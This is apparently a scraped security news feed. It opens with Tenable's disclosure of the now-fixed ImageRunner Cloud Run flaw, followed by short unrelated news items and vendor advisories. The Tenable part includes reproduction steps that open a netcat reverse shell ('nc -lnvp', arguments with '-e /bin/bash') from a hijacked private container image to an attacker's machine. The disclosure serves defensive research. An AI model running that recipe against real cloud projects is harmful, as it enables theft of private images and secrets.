Tenable Research discovered a privilege escalation vulnerability in Google Cloud Platform (GCP) that is now fixed and which we dubbed ImageRunner. At issue are identities that lack registry permissions but that have edit permissions on Google Cloud Run revisions. The vulnerability could have allowed such an identity to abuse its Google Cloud Run revision edit permissions in order to pull private Google Artifact Registry and Google Container Registry images in the same account.What are Cloud Run, Container Registry and Artifact Registry?Cloud Run, Container Registry, and Artifact Registry are key components of Google''s Cloud ecosystem for deploying and managing containerized applications. Cloud Run is a fully managed service for running containerized applications in a scalable, serverless environment.Container Registry, an older service, was deprecated in favor of Artifact Registry as of March 18, 2025. While both services are designed to store and manage container images, Artifact Registry is the next-generation solution with broader functionality and support for multiple artifact types beyond container images, such as Maven and npm packages. When Cloud Run is being used, it retrieves a container image stored in Artifact Registry and uses it to deploy your application. It manages the infrastructure, scaling and execution environment, allowing you to run your application in a serverless manner without having to worry about the underlying systems.ImageRunner vulnerability detailsWhen deploying a Cloud Run service, a new revision is created. A Cloud Run revision represents a specific version of a user’s deployed service in Google Cloud Run. Each time you deploy or update a service (such as changing the code or configuration), a new revision is created. When users deploy their Cloud Run revision, they can choose the image to deploy from a Container Registry, an Artifact Registry or Docker Hub by specifying the container image URL. Cloud Run needs IAM permissions to pull container images from the container or artifact registries, and it uses a service agent to do so. A service agent is a special type of service account created and managed by Google Cloud. It acts as the “worker” that handles essential operations, such as in Cloud Run -- pulling container images from registries like Google Container Registry or Artifact Registry to deploy the user’s application.Abusing the deployment processIf an attacker gains certain permissions within a victim’s project – specifically run.services.update and iam.serviceAccounts.actAs permissions – they could modify a Cloud Run service and deploy a new revision. In doing so, they could specify any private container image within the same project for the service to pull. This is where it gets messy: Attackers could access sensitive or proprietary images stored in a victim’s registries, bypassing these two permissions required to pull private images from the registry: Storage Object Viewer or Artifact Registry Reader.An attacker can do so by leveraging the ability to add instructions during the service update – more specifically, by adding malicious instructions.These instructions can be injected as arguments or commands in the service configuration. When the updated container runs, the malicious code executes, potentially compromising the container image. For example, the attacker could use their code to inspect the contents of the private image, extract secrets stored within it, or even exfiltrate sensitive data.The following is an example of an ncat image pull. Netcat (often abbreviated as ncat) is a powerful command-line networking tool used for creating TCP/UDP connections, transferring data, port scanning, and acting as a basic server or client for debugging. To illustrate an attacker using malicious instructions to take over an image, we used this image as a convenient example of a “private image” that is present in the victim’s Container Registry. In the following example, the attacker can add malicious instructions in the form of a reverse connection to their machine, to take over the image and inspect its contents, secrets, and more: Nonetheless, any private image can be attacked by injecting malicious instructions and tailoring a payload to the benefit of the attacker.This vulnerability arises because the service agent responsible for pulling the images executes these tasks. The service agent associated with Cloud Functions (identified by an account like service-PROJECT_NUMBER@gcf-admin-robot.iam.gserviceaccount.com) will dutifully pull the image specified in the updated service configuration. The Cloud Function’s service agent holds the required storage and Artifact Registry permissions. While this behavior is necessary for Cloud Run to function, it can be abused if permissions are not tightly controlled.Due to security reasons, we did not test and confirm it, but since the service agent of Cloud Functions is internal, we assume it might have permissions to internal Google images as well.An important note to clarify: As you would expect, the only permissions a user needs to be able to deploy a Cloud Run revision are run.services.update and iam.serviceAccounts.actAs, but the private image-pulling that GCP needs for the Cloud Run orchestration process should require additional privileges.Full attack reproductionFor the sake of the example, an attacker would attack a “ncat” image and inject malicious instructions to it:As an example, run the following commands to pull an ncat image, and push it to your Google Cloud Registry which will act as the victim’s repository. The ncat image will act as the victim''s private image:docker pull raesene/ncat gcloud auth login gcloud auth configure-docker docker tag raesene/ncat gcr.io/{project-name}/ncat:latest docker push gcr.io/{project-name}/ncat:latestControl an identity with the following permissions: run.services.update and iam.serviceAccounts.actAs permissionsUpdate a running Cloud Run service, and edit a new revisionSpecify any private container you want to hijack in the same project - for the proof-of-concept we used gcr.io/{project-name}/ncat:latestUse “nc -lnvp {port}” to listen on the attacker’s machine you want to get the reverse shell to Specify the following in the container arguments fields: {Your nc listener ip address}, {the port you listen on}, -e, /bin/bashYou should be running on the container that was deployed with the private image that you shouldn’t be able to accessThe vulnerability fix and extra steps taken by Google to enhance overall GCP securityIn response to this discovery, GCP now makes sure that the principal (user or service account) creating or updating a Cloud Run resource needs explicit permission to access the container image(s). When using Artifact Registry, you should ensure the principal has the Artifact Registry Reader (roles/artifactregistry.reader) IAM role on the project or repository containing the container image(s) to deploy.The breaking change was 100% rolled out to production on January 28, 2025. Google sent a Mandatory Service Announcement to affected Project, Folder, and Organization owners during the last week of November 2024, while the Release Notes warned users of the breaking change.After this fix, Cloud Run checks to confirm that the deployer has read access to the image.ImageRunner as an example of the Jenga® conceptImageRunner is an example of a concept we at Tenable Research call “Jenga®”, just like the game. As part of Tenable Research efforts to discover vulnerability patterns in the cloud, we unveiled this new concept at the recent BlackHat USA 2024 conference. The “Jenga®” concept is present in the major cloud providers. Here’s the gist: Cloud providers build their services on top of their other existing services. Sometimes they create “hidden services.” If one service gets attacked or is compromised, the other ones built on top of it inherit the risk and become vulnerable as well. This scenario opens the door for attackers to discover novel privilege escalation opportunities and even vulnerabilities, and introduces new hidden risks for defenders.For more information about the Jenga® concept and a new tool called Jenganizer that we released to mitigate its risk, read our blogs on the Google CloudImposer vulnerability and Google ConfusedFunction vulnerability. These blogs also discuss the issue of hidden cloud services. Stay tuned for our BlackHat talk recording about CloudImposer. Learn more about how Tenable can help you improve your GCP security.(Jenga® is a registered trademark owned by Pokonobe Associates.)

by Tenable

Xiaofeng Wang, a well-respected computer scientist and professor at Indiana University, has suddenly vanished along with his wife, Nianli Ma. The couple’s disappearance has raised a multitude of questions after their profiles were removed from the university''s website and their homes were raided by the FBI.  Wang, a prominent figure in the field of cryptography, privacy, and cybersecurity, had a distinguished career spanning over two decades. As a professor at Indiana University’s Luddy School of Informatics, Computing, and Engineering, he held academic and research roles, including serving as associate dean for research.   The Enigmatic Disappearance of Xiaofeng Wang  Wang''s work, particularly in the protection of human genomic data and systems security, earned him international recognition, and he had coauthored numerous influential papers. His academic journey included contributions to projects funded by nearly $23 million, solidifying his reputation as a leading computer scientist.  However, recent developments have cast a shadow over his career and raised serious concerns. In the last few weeks, Wang’s profile page, email account, and phone number were quietly erased from the university’s website without explanation. Similar actions were taken regarding his wife, Nianli Ma, who was a lead systems analyst at the university’s Library Technologies division. The unusual circumstances surrounding their disappearance and the removal of their digital profiles led to widespread speculation among colleagues, students, and the public, reported WIRED. The situation took a dramatic turn when FBI agents raided both of the couple’s homes in Bloomington and Carmel, Indiana. According to local news reports, several unmarked vehicles arrived at their Bloomington residence on a Friday, with agents spending hours moving boxes in and out of the property. A second raid occurred at their Carmel home, where agents conducted a search that reportedly included questioning a woman outside the property and accessing the attic. Witnesses reported seeing investigators taking photos, collecting evidence, and removing several boxes from the residence. Despite the heavy law enforcement presence, the FBI has offered little information about the raids. In a brief statement, an FBI spokeswoman confirmed that ""court-authorized law enforcement activity"" was conducted at both locations but declined to provide further details. No documents relating to Wang, Ma, or the searches were found in federal court dockets, leading to questions about the nature of the investigation.  The Disappearance Reaches Social Media  The situation has baffled many in the academic and cybersecurity communities. Matthew Green, a professor of cryptography at Johns Hopkins University, expressed his concern on social media, stating, ""None of this is in any way normal."" He noted that Wang had been missing for weeks and that his students had been unable to contact him. Fellow academic Matt Blaze, a professor at Georgetown University, also voiced his bewilderment, questioning the sudden removal of Wang’s tenure status and the university’s actions to erase his presence from its records. Local news outlet WTHR provided more details about the FBI raid in Carmel, where agents reportedly announced their presence using a megaphone, stating, ""FBI, come out!"" A woman, believed to be Ma, was seen leaving the house holding a phone, and agents subsequently questioned her before searching the property. The investigation continued for hours, with law enforcement leaving the scene with multiple boxes of evidence. A lawyer representing the family later stated that the purpose of the investigation remained unclear. The disappearance of Xiaofeng Wang and his wife, combined with the FBI’s involvement, has left many puzzled and concerned. Questions about their whereabouts, the nature of the investigation, and the reasons behind their sudden removal from the academic institution remain unanswered. As the FBI investigation unfolds, the academic and cybersecurity communities are closely monitoring the case, hoping for clarity and answers in what has become an increasingly mysterious and troubling situation.

by The Cyber Express

Apple has issued a wide set of security updates, patching multiple zero-day vulnerabilities across its operating systems — including iOS, macOS, iPadOS, and Safari — and notably extended critical fixes to older software versions, addressing previously exploited flaws. The updates remediate a series of high-risk issues that could allow attackers to execute arbitrary code, access … The post Apple Backports Zero-Day Fixes to Older iOS and macOS Versions appeared first on CyberInsider.

by Cyber Insider

Don''t fall victim to the ''small target illusion.'' Learn how cybercriminals exploit SMBs so you can fix your security gaps before it''s too late.

by ZDNET Security

For the latest discoveries in cyber research for the week of 31st March, please download our Threat Intelligence Bulletin.   TOP ATTACKS AND BREACHES New York University (NYU) suffered a cyber-attack which resulted in the exposure of over 3 million applicants’ data, including names, test scores, majors, and zip codes. The hacker redirected NYU’s website […] The post 31st March – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

What happens when you get fooled by an online scam that lands in your email or text messages? I''ll show you. Caution: Don''t try this at home.

by ZDNET Security

Kaspersky experts have discovered a new Trojan using an original virus detection technology.

by Kaspersky

Canon Marketing Japan Inc. and Canon Inc. have issued an important security update regarding a vulnerability in certain printer drivers. This Canon vulnerability, identified as CVE-2025-1268, affects a range of Canon printer models, including production printers, office multifunction devices, and small office multifunction devices.   The flaw was discovered in Canon printer drivers, specifically the Generic Plus series, which includes several common drivers used by both home and office users.  Overview of the Canon Vulnerability (CVE-2025-1268)  The issue stems from a buffer overflow in Canon printer drivers when a print job is processed by a specially crafted application. Under certain conditions, this flaw could allow unauthorized code to be executed on the affected systems. However, the frequency of this exploit is considered to be extremely low, and Canon has emphasized that there have been no confirmed cases of this vulnerability being actively exploited.  This flaw is a classic example of an out-of-bounds vulnerability, which can lead to unintended behavior in software. In this case, it could prevent printing or potentially allow attackers to execute arbitrary code on the system. Affected Printer Drivers  The vulnerability affects the following printer drivers:  Generic Plus PCL6 Printer Driver – Version 3.12 and earlier  Generic Plus UFR II Printer Driver – Version 3.12 and earlier  Generic Plus LIPS4 Printer Driver – Version 3.12 and earlier  Generic Plus LIPSLX Printer Driver – Version 3.12 and earlier  Generic Plus PS Printer Driver – Version 3.12 and earlier  These printer drivers are commonly used in a wide variety of Canon printer models, including production printers, office multifunction printers, small office multifunction printers, and laser printers.  The Security Impact of CVE-2025-1268  The vulnerability is particularly concerning because it has the potential to be exploited by malicious actors through a crafted application that interacts with these vulnerable Canon printer drivers.   According to the CVSS (Common Vulnerability Scoring System), the severity of this issue is rated at 9.4 (on a scale of 0 to 10), which places it in the critical category.  The CVSS 3.1 score for this vulnerability is as follows:  Base Score: 9.4  Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L  This score indicates a high impact on confidentiality and integrity, as well as a low requirement for user interaction, making it a relatively easy vulnerability for attackers to exploit if the proper conditions are met.  Canon’s Response and Recommendations  While there have been no known instances of this vulnerability being actively exploited, Canon strongly advises users to take action to mitigate potential risks. The company has recommended updating the affected printer drivers to the latest versions available. These updates, which contain fixes for the Canon printer vulnerability, can be downloaded from the official Canon websites or through local Canon sales representatives.  Conclusion   The discovery of this vulnerability by Robert Ord in collaboration with the Microsoft Offensive Research and Security Engineering (MORSE) Team highlights the critical role of security researchers in identifying and addressing potential risks in connected devices like printers.  While the immediate threat may be low, the potential for damage highlights the importance of regularly updating Canon printer drivers to maintain network security. 

by The Cyber Express

World Backup Day, observed annually on March 31, serves as a reminder of the importance of protecting data against cyber threats, accidental deletions, and technical failures. Despite growing awareness, many firms still overlook a major vulnerability that can render even the most complex backup strategies ineffective: human error. Employees—often unknowingly—pose risks to backup integrity through mistakes such as accidental deletions, misconfigured backup settings, and falling victim to social engineering attacks. One of the latest surveys highlights concerning trends: 55% of users rely on cloud storage as their primary backup method, yet only 33% back up their data regularly. Furthermore, 34% of respondents cited accidental deletion and lack of backup as the leading causes of data loss. These statistics show us the reality—without strong backup practices and employee awareness, businesses remain vulnerable to data breaches, ransomware attacks, and irreversible data loss. As Amit Luthra, Managing Director of Lenovo ISG India, aptly puts it: “In an era where AI adoption accelerates and IT infrastructures grow increasingly complex, ensuring seamless data availability and resilience has become paramount. Cyber threats, system failures, and stringent compliance mandates necessitate robust backup and disaster recovery strategies—not merely as safeguards, but as business imperatives. Lenovo''s ThinkSystem and ThinkAgile solutions are meticulously engineered to meet these evolving demands. They provide secure, scalable, and AI-ready infrastructure that ensures continuous data protection.” This highlights a point: backup strategies must evolve alongside technological advancements. Simply having a backup is no longer enough—it must be resilient, automated, and cyber-aware to mitigate both technical and human-induced risks. This article explores the most common human errors in backup management, the risks of data loss, and effective strategies organizations can implement to safeguard their backup systems from internal mistakes and cyber threats. Common Human Errors in Backup Management Even the most advanced backup systems can fail due to simple human mistakes. Here are some of the most common errors employees make: [caption id=""attachment_101755"" align=""aligncenter"" width=""1024""] Source: TCE[/caption] Accidental Deletion of Critical Files: Employees may unintentionally delete essential files or entire folders, assuming they are no longer needed. If backups are not frequent or properly structured, restoring deleted data becomes impossible. Overwriting Backup Data: When employees manually back up files, they sometimes overwrite crucial previous versions, eliminating the ability to recover older data in case of errors. Failure to Follow Backup Protocols: Organizations implement backup policies, but employees may neglect to follow them. This includes failing to run scheduled backups or disconnecting backup drives before completion. Mishandling Physical Backup Devices: External hard drives, USBs, and SD cards are prone to damage or loss. An unintentional drop or misplacement can result in irrecoverable data loss. Ignoring Security Measures: Employees often reuse weak passwords, misconfigure backup settings, or unknowingly expose backups to cyber threats. These mistakes highlight the need for a comprehensive backup strategy and employee training to prevent data loss. The Main Data Risks and the Role of Backup in Mitigation Data loss occurs due to various factors, with ransomware attacks leading the charge. Here’s an overview of the most significant threats and how backups mitigate them: [caption id=""attachment_101757"" align=""aligncenter"" width=""1024""] Source: TCE[/caption] Ransomware Attacks: Ransomware encrypts files and demands a ransom for decryption. Even if organizations pay, there''s no guarantee of file recovery. A strong backup strategy ensures quick restoration without paying cybercriminals. Technical Failures: Hardware crashes, software corruption, and system failures can render data inaccessible. Cloud backups provide real-time recovery, reducing downtime and ensuring business continuity. Human Error: Employees may accidentally delete, overwrite, or misplace critical files. A versioned backup system allows restoration to previous states, mitigating accidental losses. Physical Disasters: Fires, floods, and power surges can wipe out local storage. Offsite and cloud backups provide a safety net against such disasters. Organizations must implement strong backup solutions to counteract these threats effectively. Social Engineering Attacks Targeting Backups Cybercriminals exploit human psychology to infiltrate backup systems. Some common tactics include: Phishing Attacks: Attackers trick employees into clicking malicious links or downloading malware that compromises backups. Impersonation and Pretexting: Hackers pose as IT personnel, convincing employees to grant unauthorized access to backup systems. Insider Threats: Disgruntled employees with access to backups can delete, alter, or leak sensitive data. To prevent these threats, businesses must implement multi-factor authentication, access controls, and security awareness training. How to Implement a Backup Strategy for Workplace Cybersecurity A structured backup strategy ensures data integrity and swift recovery. Here’s a recommended approach: 1. Follow the 3-2-1 Backup Rule Maintain 3 copies of data: 1 primary and 2 backups. Store backups on 2 different media types (e.g., cloud and external drive). Keep 1 backup offsite for disaster recovery. 2. Automate Backups Schedule daily or real-time backups to prevent accidental data loss. Ensure versioning so previous file versions remain accessible. 3. Encrypt Backup Data Use end-to-end encryption to prevent unauthorized access. Restrict access to authorized personnel only. 4. Regularly Test Backups Conduct routine recovery drills to verify data integrity. Ensure that restoration procedures work as intended. [caption id=""attachment_101758"" align=""aligncenter"" width=""1024""] Source: TCE[/caption] Training Employees to Follow Best Backup Practices Educating employees on proper backup protocols is key to reducing human errors. Consider implementing: 1. Employee Cybersecurity Awareness Programs Teach employees about phishing risks and social engineering threats. Demonstrate how to recognize suspicious backup activity. 2. Regular Backup Training Sessions Train employees on how and when to back up data. Provide guides on secure backup handling. 3. Access Control Measures Limit backup access to authorized personnel only. Implement role-based permissions to prevent accidental deletions. 4. Incident Response Drills Simulate backup recovery scenarios to ensure employees are prepared. Test their ability to restore files in real-time. By incorporating these practices, organizations can minimize human errors and strengthen their backup resilience. To Sum Up As the survey reveals, human error remains one of the biggest threats to backup integrity. Accidental deletions, overwritten files, ignored security protocols, and misplaced backup devices can wipe out important data in an instant. The reality is: that even the best technology cannot compensate for poor user practices. Organizations must stop viewing backups as a one-time solution and start treating them as an ongoing responsibility. Automating backup processes, enforcing security policies, and educating employees about their role in data protection are not optional—they are essential. Without a well-executed backup strategy, businesses risk more than just data loss; they risk their reputation, financial stability, and long-term survival. As Amit Luthra emphasizes, the modern backup strategy must “transcend mere recovery; it embodies proactive resilience.” That means integrating immutable backups, cyber resilience, and AI-driven automation into backup protocols. With ransomware and cyber threats evolving rapidly, the question isn''t just whether you have a backup—it’s whether your backup strategy is resilient enough to tolerate human errors. The time to act is now. Because when disaster happens, the only thing worse than losing your data is realizing it was preventable. Image Reference: All images inserted in this article are self-designed by the author with the help of Canva.

by The Cyber Express

Sucuri researchers spotted threat actors deploying WordPress malware in the mu-plugins directory to evade security checks. In February, Sucuri warned of threat actors exploiting WordPress mu-plugins, which auto-load without activation, to maintain persistence and evade detection by hiding backdoors in the plugin directory. “Unlike regular plugins, must-use plugins are automatically loaded on every page load, […]

by Security Affairs

The Moscow Metro website and mobile application experienced disruptions on March 31, 2023. The Moscow subway app users reported various malfunctions, including issues loading personal accounts and difficulties in accessing key features like ticket purchasing and account management. The metro website, which is an essential tool for navigating the city’s vast metro system, became unavailable on the same day, displaying a peculiar message that hinted at an alleged cyberattack.  The message, which was a technical failure banner, mimicked a similar notification that had appeared on the Ukrainian Railways website a few days prior. Ukrainian Railways, known locally as Ukrzaliznytsia, had fallen victim to a large-scale cyberattack on March 23, 2023. As a result, its website and mobile application were rendered inoperable, preventing travelers from purchasing tickets online. The state-owned railway company attributed the attack to ""the enemy"" but did not provide further details on the perpetrators.  The Moscow Metro and Ukrainian Railways Incident  The disruption of the Moscow Metro’s digital services comes amid a broader wave of cyberattacks targeting transportation infrastructure in the region. On March 31, Russian users flocked to the crash detection service Downdetector.su to report issues with both the app and its website, mosmetro.ru. Affected users complained about an inability to access personal accounts, problems with payment sections, and complete failures in app functionality. The crash detection service noted that up to 40,000 users had reported issues on that day alone, reported The Kyiv Independent. Interestingly, the website displayed a banner featuring a message in Ukrainian, along with a reference to Ukrainian Railways. This sparked widespread speculation that the Moscow Metro''s website had been compromised in a manner similar to the earlier attack on Ukrzaliznytsia. While Russian authorities have not confirmed this, experts suspect that hackers could be behind the disruption, particularly since the Ukrainian Railways site had suffered a similar breach just days earlier. Moscow Metro''s Response to the Outage  [caption id=""attachment_101741"" align=""aligncenter"" width=""552""] Statement from Dept. of Transport. Operational (Source: Telegram)[/caption] The Moscow transport department quickly issued a statement via their official Telegram channel, acknowledging the technical difficulties and reassuring passengers that steps were being taken to resolve the issues. According to the department, the outages were due to ""technical maintenance,"" and users were advised to expect temporary problems when accessing personal accounts in the app. Despite the app’s malfunctions, passengers could still replenish their “Troika” transport cards at physical ticket offices and terminals throughout metro stations.  Roskomnadzor, Russia’s federal service for surveillance of communications, also acknowledged the increase in reports about Moscow Metro’s technical issues. However, the agency refrained from commenting on the specific causes of the disruptions, which continue to be a source of concern for commuters.  The Moscow Metro’s website was temporarily down for most of the day, but the disruption raised more questions than answers. For instance, one of the key complaints from Russian users was the difficulty in paying for tickets via the metro’s payment system, as the payment section did not load properly on the app. Many users also noted that the app would not load entirely, leaving them unable to access their accounts or purchase tickets.  Conclusion   The recent cyberattack on Ukrainian Railways (Ukrzaliznytsia) and the subsequent disruptions to the Moscow Metro app and website highlight the growing vulnerability of critical infrastructure to digital threats.   While Ukrzaliznytsia has partially restored its online ticketing services after an intense recovery effort, the incident highlighted the challenges of securing essential systems against such attacks. The simultaneous issues faced by the metro suggest a potential connection, raising concerns about the broader implications for cybersecurity in politically sensitive regions. 

by The Cyber Express

An example of a web security vulnerability is cross-site scripting (XSS), which enables attackers to insert malicious executable scripts…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Learn how to plan a CTI project using key documentation in this comprehensive guide. Avoid roadblocks and set your project up for success!Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Bishop Fox researcher, Jon Williams, explains how they successfully exploited CVE-2024-53704, an authentication bypass in unpatched SonicWall firewalls.

by Bishop Fox

A breakdown of CVE-2025-24813 in Apache Tomcat—what it is, who’s actually at risk, and why most users likely aren’t affected. Keep calm and patch your servers.

by Bishop Fox

Tired of boring scans? Meet Greybeard, Snyk''s humorous AI security CLI that gives unforgettable, brutally honest vulnerability feedback developers won''t forget. Greybeard is an April Fool''s tool that really works.

by Snyk

Here are five standout questions and answers from Snyk’s Fetch the Flag CTF event on February 27 and 28. Sit down with cybersecurity educator and developer influencer John Hammond—along with challenge designer Matt Kiely (aka huskyhacks), and developer advocates Micah Silverman, Sonya Moisset, Vandana Verma, and Elliot Ward—for a live Q&A session.

by Snyk

Outlaw is a persistent Linux malware leveraging simple brute-force and mining tactics to maintain a long-lasting botnet.

by Elastic Security Lab

<p>U.S. government contractors need to start preparing for a proposed new government-wide Controlled Unclassified Information (CUI) protection requirement.</p>

by TrustedSec

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-24185.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-24210.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to disclose sensitive information on affected installations of Apple macOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.4. The following CVEs are assigned: CVE-2025-24256.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2025-24182.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-24190.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-24211.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-24230.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-24243.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. Interaction with the AudioToolboxCore library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2025-24244.

by Zero Day Initiative Advisories

The threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp. The activity has been attributed to a suspected Russian hacking group called Water Gamayun, which is also known as EncryptHub and LARVA-208. ""The threat actor deploys payloads primarily by means of

by The Hacker News

Although Oracle has denied its cloud infrastructure services were breached, security experts recommend Oracle customers independently verify if they were affected and take measures to reduce exposure to potential fallout.

by Dark Reading

Next-level malware represents a new era of malicious code developed specifically to get around modern security software like digital forensics tools and EDR, new research warns.

by Dark Reading

The transportation vertical is rapidly growing, yet it is often overlooked by MSPs. See why MSPs should pay attention to transportation cybersecurity in this post.

by Barracuda

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Cisco Smart Licensing Utility flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Cisco Smart Licensing Utility vulnerability, tracked as CVE-2024-20439, to its Known Exploited Vulnerabilities (KEV) catalog. Last week, Cisco disclosed two vulnerabilities in its Smart Licensing Utility: CVE-2024-20439, […]

by Security Affairs

Xiaofeng Wang, a longtime computer science professor at Indiana University, has disappeared along with his wife, and their profiles on the school''s website were wiped ahead of recent FBI raids.

by WIRED Security News

The U.S. Cybersecurity and Information Security Agency (CISA) has issued an advisory detailing a new malware variant detected in attacks on an Ivanti vulnerability. The CISA advisory says the agency recovered three files from a critical infrastructure environment’s Ivanti Connect Secure device after threat actors exploited Ivanti vulnerability CVE-2025-0282 for initial access. One of the files contained a new malware variant that CISA is calling RESURGE, which is similar to SPAWNCHIMERA in that it creates a Secure Shell (SSH) tunnel for command and control activities. The new variant adds important new capabilities, however. RESURGE Malware Adds New Capabilities RESURGE malware goes well beyond SPAWNCHIMERA with its ability to modify files, manipulate integrity checks, and create a web shell that is copied to the running Ivanti boot disk. The RESURGE file, ''libdsupgrade.so,'' is a malicious 32-bit Linux Shared Object file, CISA said. The file contains a rootkit, dropper, backdoor, bootkit, proxy, and tunneler. A second file (‘liblogblock.so’) is a variant of the SPAWNSLOTH log tampering utility that was contained within the RESURGE sample. The third file (‘dsmain’) is a custom embedded binary containing an open-source shell script and applets from the open-source tool BusyBox, CISA said. The shell script can extract an uncompressed kernel image (vmlinux) from a compromised kernel image, while BusyBox lets threat actors “perform various functions such as download and execute payloads on compromised devices,” the agency said. CISA included file hashes and YARA detection rules based on the SHA-256 hashes. For RESURGE, the SHA-256 hash is 52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda. The SPAWNSLOTH hash is 3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104, and the dsmain hash is b1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d. CISA Recommendations CISA recommended a number of controls in the advisory, such as: Disabling file and printer sharing services if possible, or at least using strong passwords or Active Directory authentication. Restricting users'' ability to install and run unwanted software applications. Exercising caution when opening e-mail attachments “even if the attachment is expected and the sender appears to be known.” Enabling a personal firewall on workstations and configuring it to deny unsolicited connection requests. Disabling unnecessary services on workstations and servers. Scanning for and removing suspicious e-mail attachments, and ensuring that the attachment extension matches the file header. Maintaining awareness of the latest threats and implementing appropriate Access Control Lists (ACLs).  

by The Cyber Express

New research from Specops Software shows attackers successfully attack and gain access to RDP with the most basic passwords.

by Dark Reading

The department was able to trace the stolen funds to three main cryptocurrency accounts after being routed through a series of other platforms.

by Dark Reading

The government’s proposed Cyber Security and Resilience Bill is set to include regulatory provisions covering both datacentre operators and larger IT service providers

by ComputerWeekly

Oracle has denied at least one breach, despite evidence to the contrary, as it begins notifying healthcare customers of a separate patient data breach.

by TechCrunch

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Introduction to Exchange Online PowerShell Exchange Online PowerShell is a command-line management interface for administering and automating tasks in Exchange Online, which is a part of Microsoft 365. It allows administrators to manage user mailboxes, configure organizational settings, and perform bulk operations efficiently through scripting. Here are some benefits of using PowerShell for Exchange Online … Continued

by Netwrix

Threat actors are exploiting a vulnerability in Ivanti Connect Secure first disclosed by the vendor in January.

by Dark Reading

Ransomware attacks are exploiting vulnerabilities in smart devices. How do we protect ourselves?

by Kaspersky

Threat actors are using the ""mu-plugins"" directory in WordPress sites to conceal malicious code with the goal of maintaining persistent remote access and redirecting site visitors to bogus sites. mu-plugins, short for must-use plugins, refers to plugins in a special directory (""wp-content/mu-plugins"") that are automatically executed by WordPress without the need to enable them explicitly via the

by The Hacker News

From beginner''s mind in tech and high agency living, to critical cloud vulnerabilities and the future of writing with AI, plus an epic ultramarathon victory.

by Hive Five

The API testing firm took down a database exposed to the internet without a password.

by TechCrunch

Every week, someone somewhere slips up—and threat actors slip in. A misconfigured setting, an overlooked vulnerability, or a too-convenient cloud tool becomes the perfect entry point. But what happens when the hunters become the hunted? Or when old malware resurfaces with new tricks? Step behind the curtain with us this week as we explore breaches born from routine oversights—and the unexpected

by The Hacker News

Explore industry moves and significant changes in the industry for the week of March 31, 2025. Stay updated with the latest industry trends and shifts.

by SecurityWeek

If you''re using AWS, it''s easy to assume your cloud security is handled - but that''s a dangerous misconception. AWS secures its own infrastructure, but security within a cloud environment remains the customer’s responsibility. Think of AWS security like protecting a building: AWS provides strong walls and a solid roof, but it''s up to the customer to handle the locks, install the alarm systems,

by The Hacker News

The cybersecurity artificial intelligence (AI) model and agent will help organizations improve threat detection and incident response.

by Dark Reading

France''s competition authority has fined Apple €150 million ($162M) for leveraging its privacy framework, App Tracking Transparency (ATT), to distort competition. The case underscores how privacy, when implemented asymmetrically, can become a strategic tool that undermines both market fairness and user agency. The fine, issued by the Autorité de la Concurrence, concludes a multi-year investigation … The post France Fines Apple €150M for Weaponizing Privacy Against Competitors appeared first on CyberInsider.

by Cyber Insider

Entities in Ukraine have been targeted as part of a phishing campaign designed to distribute a remote access trojan called Remcos RAT. ""The file names use Russian words related to the movement of troops in Ukraine as a lure,"" Cisco Talos researcher Guilherme Venere said in a report published last week. ""The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to

by The Hacker News

In the latest Windows 11 Insider Preview Build 26200.5516, Microsoft has removed the ability to install the operating system without both internet connectivity and a Microsoft account, effectively eliminating a long-standing workaround that allowed local account setups during installation. The change was first spotted by security researcher Will Dormann, who noted that Microsoft has removed … The post Windows 11 Installations to Require Internet Connection and Microsoft Account appeared first on CyberInsider.

by Cyber Insider

